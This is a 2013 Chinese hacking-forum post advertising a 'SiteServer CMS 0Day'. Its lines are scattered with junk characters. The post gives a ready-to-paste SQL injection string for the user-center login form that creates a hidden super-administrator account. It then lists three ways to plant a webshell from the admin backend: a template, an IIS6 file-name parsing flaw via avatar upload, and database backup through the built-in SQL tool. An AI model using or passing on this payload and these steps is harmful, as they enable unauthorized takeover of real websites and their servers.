找回密码
 立即注册
查看: 2880|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
经测试秒杀最新的3.5版& ^* \, B/ f8 l4 t3 }2 |( E" [# O, o$ m
* P6 V, u$ |* Q# M' h8 u
stieserver官网:www.siteserver.cn5 ^- d& q2 B# n7 o
1 Z6 w$ w# e2 K: y0 z
* _3 j" i2 Q: a8 o* i  e, |
  W$ z7 r/ e$ }4 F2 U/ ]  P
EXP:; g- r4 j! p. c0 e( ^

" Z. _' I  R6 N% }' u6 E% U4 z: r/ H0 ]直接访问UserCenter/login.aspx4 h( r+ D# h, r" m1 b2 |% O: F

! p4 ~# J0 P" S
# c: h! Y7 [, s+ P+ a# K' t8 r' c. q8 z
用户名处输入:
2 ?6 R9 P; \* N2 y4 g& t4 a  L7 v  O3 W( G
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
* u" P$ d* c5 j$ @$ R6 Y- [! i( |( F8 @& ]: ^

" \" s2 W  w- J. E; s. y8 s% D4 a. j( Y! b+ U5 S* P
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
6 [' f$ @/ G2 p* W4 C
- x/ U. D* M" c6 e" }$ o; r
. j! E! q  A3 c7 u  X3 I4 u1 x. V9 x% u
之后再访问后台SiteServer/login.aspx用插入的用户登陆: F: E$ H1 w: a$ |7 O
' F& r& p6 ?# N9 W+ Z3 ]
" _3 ^  ]; e* n, Y0 r4 o3 A+ R7 X

3 S+ r/ P) }7 ~8 A5 e后台拿webshell的三种方法:- f. X. S+ G0 a

7 [6 E: ~8 @7 v( j一、! @7 C6 i% Q( m9 [: j$ _" n& E( R9 U
. T/ {3 O+ }) k! N
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx. p( Y! s$ z9 E
) ?9 H& i0 F/ ?1 M8 A
二、: B- P6 h0 B2 K5 c/ Y0 }# c! v
5 A. w! J# |# y0 ?( a+ E$ q
成员权限-》添加用户-》用户名为:1.asp! [# r' K( g" G, {% z
2 C; i! K) G# @! k+ Z5 ~
http://127.0.0.1/usercenter/; L' a/ u! V5 q" f8 c3 x: ~' ^

) y- j8 H" ^* B' U用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
0 _8 |$ F/ d$ L" F
( h6 V% P4 l8 K(ps:后台添加用户时不会验证是否含有非法字符)
" Q9 c( L* {% j! n+ L# t1 V7 V+ z5 ^: K$ ?/ a* y
三、) n6 c/ T3 C/ [/ A
9 u, [  M& A* F  j, Y3 v+ n) A
系统工具-》实用工具-》机器参数查看
  z1 J% T: {: Q可以看到数据库类型、名称,WEB路径
5 d: U" P$ N8 p6 ?" \- S4 r9 {( @0 E( K
. Q$ f& i  c2 e1 Q系统工具-》数据库工具-》SQL语句查询
7 q0 l# `  l* _8 S' I这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
# E+ B: H6 O0 u+ v' p6 R5 e) `% z: w9 p* o/ m# H
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表